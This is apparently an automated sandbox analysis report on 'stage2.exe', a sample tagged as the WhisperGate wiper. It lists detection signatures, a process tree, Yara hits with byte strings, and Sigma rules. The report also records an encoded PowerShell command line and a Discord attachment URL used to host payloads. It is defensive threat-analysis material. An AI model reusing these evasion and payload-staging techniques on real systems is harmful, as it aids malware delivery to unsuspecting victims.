Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report stage2.exe

Overview

General Information

Sample Name:stage2.exe
Analysis ID:553986
MD5:14c8482f302b5e81e3fa1b18a509289d
SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags:DEV-0586exeWhisperGate
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
stage2.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exeAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exeMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmpAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084JoeSecurity_MSIL_Downloader_GenericYara detected MSIL_Downloader_GenericJoe Security
    Click to see the 2 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    1.2.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.2.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    1.2.stage2.exe.ea0000.0.unpackMAL_Unknown_Discord_Characteristics_Jan22_1Detects unknown malware with a few indicators also found in Wiper malwareFlorian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
    1.0.stage2.exe.ea0000.0.unpackAPT_HKTL_Wiper_WhisperGate_Jan22_2Detects unknown wiper malwareFlorian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
    Click to see the 7 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Suspicious Execution of Powershell with Base64Show sources
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
    Sigma detected: T1086 PowerShell ExecutionShow sources
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: stage2.exeVirustotal: Detection: 44%Perma Link
    Source: stage2.exeReversingLabs: Detection: 48%
    Machine Learning detection for sampleShow sources
    Source: stage2.exeJoe Sandbox ML: detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F0 CryptReleaseContext,
    Source: stage2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
    Source: stage2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
